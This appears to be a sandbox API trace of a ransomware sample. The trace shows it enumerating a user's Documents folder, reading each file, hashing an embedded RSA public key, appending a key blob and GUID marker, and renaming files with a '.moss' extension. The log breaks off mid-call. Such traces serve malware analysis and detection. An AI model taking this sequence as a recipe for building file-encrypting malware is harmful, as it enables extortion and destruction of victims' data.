[0169.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.734] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.735] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.735] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.735] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.736] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.736] GetLastError () returned 0x0 [0169.736] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.736] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.736] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.736] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.736] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x6110) returned 0x3b48820 [0169.736] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b459c8 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfa8 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45a10 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfc0 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbff0 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc008 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.737] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4e938 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbff0 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc008 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e938 | out: hHeap=0xcd0000) returned 1 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc008 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbff0 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc008 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbff0 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.737] GetCurrentThreadId () returned 0x324 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32b40 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.738] GetCurrentThreadId () returned 0x324 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.739] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6114, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.739] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.739] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.739] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.739] CloseHandle (hObject=0x664) returned 1 [0169.740] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.740] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.740] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kb5b.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kb5b.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kb5b.csv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kb5b.csv.moss")) returned 1 [0169.742] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ab2fa80, ftCreationTime.dwHighDateTime=0x1d5dbae, ftLastAccessTime.dwLowDateTime=0x939f2aa0, ftLastAccessTime.dwHighDateTime=0x1d5e013, ftLastWriteTime.dwLowDateTime=0x939f2aa0, ftLastWriteTime.dwHighDateTime=0x1d5e013, nFileSizeHigh=0x0, nFileSizeLow=0x9385, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kX0JIZYtRxGkB.pdf", cAlternateFileName="KX0JIZ~1.PDF")) returned 1 [0169.742] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.742] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.742] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kX0JIZYtRxGkB.pdf") returned=".pdf" [0169.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kX0JIZYtRxGkB.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kx0jizytrxgkb.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.742] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=37765) returned 1 [0169.742] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.745] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x935f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.745] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.746] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x9385, lpOverlapped=0x0) returned 1 [0169.746] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.746] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.747] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.747] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.749] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.749] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.749] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.749] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.749] GetLastError () returned 0x0 [0169.749] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.749] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.749] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.749] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.749] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.749] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.750] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9385, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.750] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.750] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.750] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.750] CloseHandle (hObject=0x664) returned 1 [0169.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b4b098 [0169.752] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kX0JIZYtRxGkB.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kx0jizytrxgkb.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kX0JIZYtRxGkB.pdf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kx0jizytrxgkb.pdf.moss")) returned 1 [0169.753] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0169.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f28b8 [0169.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a20 [0169.753] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0169.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f28b8 [0169.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xfc) returned 0xd57fe0 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b412b8 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2e58 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2de0 [0169.754] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f28b8 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.754] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f28b8 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0169.754] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8472fb0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xfc59de90, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0xfc59de90, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NsI7Q_Ai4cQKUwAhGA5", cAlternateFileName="NSI7Q_~1")) returned 1 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x16c) returned 0x3b424b0 [0169.754] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb866c410, ftCreationTime.dwHighDateTime=0x1d5d87a, ftLastAccessTime.dwLowDateTime=0x5eb96620, ftLastAccessTime.dwHighDateTime=0x1d5dbe5, ftLastWriteTime.dwLowDateTime=0x5eb96620, ftLastWriteTime.dwHighDateTime=0x1d5dbe5, nFileSizeHigh=0x0, nFileSizeLow=0x189aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfhlPq h4.ppt", cAlternateFileName="OFHLPQ~1.PPT")) returned 1 [0169.754] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 